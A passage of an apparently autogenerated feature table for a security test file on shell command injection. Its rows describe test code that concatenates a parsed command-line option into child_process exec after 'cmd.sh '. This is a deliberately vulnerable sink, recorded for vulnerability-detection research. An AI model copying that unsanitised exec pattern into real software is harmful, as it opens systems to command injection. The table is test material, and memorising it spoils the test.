| exec | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:5:102:8 | exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:5:102:8 | exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:10:102:18 | "cmd.sh " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:10:102:18 | "cmd.sh " | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:10:102:18 | "cmd.sh " | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:10:102:18 | "cmd.sh " | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:10:102:18 | "cmd.sh " | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:10:102:18 | "cmd.sh " | stringConcatenatedWith | -endpoint- parser.parse_args().foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:10:102:44 | "cmd.sh ... s().foo | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:10:102:44 | "cmd.sh ... s().foo | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:10:102:44 | "cmd.sh ... s().foo | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:10:102:44 | "cmd.sh ... s().foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:10:102:44 | "cmd.sh ... s().foo | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:10:102:44 | "cmd.sh ... s().foo | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:10:102:44 | "cmd.sh ... s().foo | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:10:102:44 | "cmd.sh ... s().foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:10:102:44 | "cmd.sh ... s().foo | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:22:102:27 | parser | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:22:102:27 | parser | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:22:102:27 | parser | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:22:102:27 | parser | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:22:102:27 | parser | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:22:102:38 | parser.parse_args | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:22:102:38 | parser.parse_args | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:22:102:38 | parser.parse_args | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:22:102:38 | parser.parse_args | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:22:102:38 | parser.parse_args | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:22:102:40 | exceptional return of parser.parse_args() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:22:102:40 | exceptional return of parser.parse_args() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:22:102:40 | exceptional return of parser.parse_args() | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:22:102:40 | exceptional return of parser.parse_args() | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:22:102:40 | exceptional return of parser.parse_args() | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:22:102:40 | parser.parse_args() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:22:102:40 | parser.parse_args() | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:22:102:40 | parser.parse_args() | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:22:102:40 | parser.parse_args() | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:22:102:40 | parser.parse_args() | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:22:102:44 | parser. ... s().foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:22:102:44 | parser. ... s().foo | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:22:102:44 | parser. ... s().foo | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:22:102:44 | parser. ... s().foo | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:22:102:44 | parser. ... s().foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:22:102:44 | parser. ... s().foo | stringConcatenatedWith | 'cmd.sh ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:29:102:38 | parse_args | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:29:102:38 | parse_args | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:29:102:38 | parse_args | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:29:102:38 | parse_args | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:29:102:38 | parse_args | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:42:102:44 | foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:42:102:44 | foo | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:42:102:44 | foo | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:42:102:44 | foo | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:42:102:44 | foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:1:109:2 | (functi ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:1:109:2 | (functi ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:1:109:2 | (functi ... T OK\\n}) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:2:105:1 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:2:105:1 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:2:105:1 | cp | enclosingFunctionBody | commandLineArgs require command-line-args options commandLineArgs optionDefinitions cp exec cmd.sh options foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:2:105:1 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:2:105:1 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:2:105:1 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:2:105:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:2:105:1 | require | enclosingFunctionBody | commandLineArgs require command-line-args options commandLineArgs optionDefinitions cp exec cmd.sh options foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:2:105:1 | require | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:2:105:1 | require | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:2:105:1 | this | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:2:105:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:2:105:1 | this | enclosingFunctionBody | commandLineArgs require command-line-args options commandLineArgs optionDefinitions cp exec cmd.sh options foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:2:105:1 | this | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:2:105:1 | this | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:2:109:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:2:109:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:2:109:1 | 'arguments' object of anonymous function | enclosingFunctionBody | commandLineArgs require command-line-args options commandLineArgs optionDefinitions cp exec cmd.sh options foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:2:109:1 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:2:109:1 | 'arguments' object of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:2:109:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:2:109:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:2:109:1 | exceptional return of anonymous function | enclosingFunctionBody | commandLineArgs require command-line-args options commandLineArgs optionDefinitions cp exec cmd.sh options foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:2:109:1 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:2:109:1 | exceptional return of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:2:109:1 | functio ... OT OK\\n} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:2:109:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:2:109:1 | functio ... OT OK\\n} | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:2:109:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:2:109:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:2:109:1 | return of anonymous function | enclosingFunctionBody | commandLineArgs require command-line-args options commandLineArgs optionDefinitions cp exec cmd.sh options foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:2:109:1 | return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:105:2:109:1 | return of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:8:106:22 | commandLineArgs | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:8:106:22 | commandLineArgs | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:8:106:22 | commandLineArgs | enclosingFunctionBody | commandLineArgs require command-line-args options commandLineArgs optionDefinitions cp exec cmd.sh options foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:8:106:22 | commandLineArgs | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:8:106:22 | commandLineArgs | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:8:106:53 | command ... -args') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:8:106:53 | command ... -args') | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:8:106:53 | command ... -args') | enclosingFunctionBody | commandLineArgs require command-line-args options commandLineArgs optionDefinitions cp exec cmd.sh options foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:8:106:53 | command ... -args') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:8:106:53 | command ... -args') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:8:106:53 | commandLineArgs | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:8:106:53 | commandLineArgs | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:8:106:53 | commandLineArgs | enclosingFunctionBody | commandLineArgs require command-line-args options commandLineArgs optionDefinitions cp exec cmd.sh options foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:8:106:53 | commandLineArgs | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:8:106:53 | commandLineArgs | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:26:106:32 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:26:106:32 | require | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:26:106:32 | require | enclosingFunctionBody | commandLineArgs require command-line-args options commandLineArgs optionDefinitions cp exec cmd.sh options foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:26:106:32 | require | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:26:106:32 | require | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:26:106:53 | exceptional return of require ... -args') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:26:106:53 | exceptional return of require ... -args') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:26:106:53 | exceptional return of require ... -args') | enclosingFunctionBody | commandLineArgs require command-line-args options commandLineArgs optionDefinitions cp exec cmd.sh options foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:26:106:53 | exceptional return of require ... -args') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:26:106:53 | exceptional return of require ... -args') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:26:106:53 | require ... -args') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:26:106:53 | require ... -args') | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:26:106:53 | require ... -args') | enclosingFunctionBody | commandLineArgs require command-line-args options commandLineArgs optionDefinitions cp exec cmd.sh options foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:26:106:53 | require ... -args') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:26:106:53 | require ... -args') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:34:106:52 | 'command-line-args' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:34:106:52 | 'command-line-args' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:34:106:52 | 'command-line-args' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:34:106:52 | 'command-line-args' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:34:106:52 | 'command-line-args' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:34:106:52 | 'command-line-args' | enclosingFunctionBody | commandLineArgs require command-line-args options commandLineArgs optionDefinitions cp exec cmd.sh options foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:34:106:52 | 'command-line-args' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:34:106:52 | 'command-line-args' | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:8:107:14 | options | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:8:107:14 | options | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:8:107:14 | options | enclosingFunctionBody | commandLineArgs require command-line-args options commandLineArgs optionDefinitions cp exec cmd.sh options foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:8:107:14 | options | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:8:107:14 | options | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:8:107:51 | options | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:8:107:51 | options | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:8:107:51 | options | enclosingFunctionBody | commandLineArgs require command-line-args options commandLineArgs optionDefinitions cp exec cmd.sh options foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:8:107:51 | options | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:8:107:51 | options | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:8:107:51 | options ... itions) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:8:107:51 | options ... itions) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:8:107:51 | options ... itions) | enclosingFunctionBody | commandLineArgs require command-line-args options commandLineArgs optionDefinitions cp exec cmd.sh options foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:8:107:51 | options ... itions) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:8:107:51 | options ... itions) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:18:107:32 | commandLineArgs | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:18:107:32 | commandLineArgs | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:18:107:32 | commandLineArgs | enclosingFunctionBody | commandLineArgs require command-line-args options commandLineArgs optionDefinitions cp exec cmd.sh options foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:18:107:32 | commandLineArgs | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:18:107:32 | commandLineArgs | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:18:107:51 | command ... itions) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:18:107:51 | command ... itions) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:18:107:51 | command ... itions) | enclosingFunctionBody | commandLineArgs require command-line-args options commandLineArgs optionDefinitions cp exec cmd.sh options foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:18:107:51 | command ... itions) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:18:107:51 | command ... itions) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| 